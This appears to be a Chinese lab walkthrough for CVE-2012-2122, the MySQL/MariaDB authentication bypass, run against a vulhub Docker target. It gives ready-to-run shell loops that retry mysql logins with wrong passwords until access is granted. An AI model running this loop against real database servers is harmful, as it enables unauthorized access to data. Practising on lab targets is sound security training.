漏洞影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
演示
开启靶场
进入漏洞目录
cd /root/vulhub/mysql/CVE-2012-2122
开启漏洞靶场
docker-compose up -d
攻击
直接 运行 这个命令
for i in `seq 1 100`;do mysql -uroot -p11111 -h 192.168.61.128 -P3306;done
for i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done
这个命令的意思就是:for语句调用终端去连接MySQL,如果存在这个漏洞,他就会不断的去尝试进入 MySQL 数据库中
显示数据库
show databases;
显示数据库版本
select version();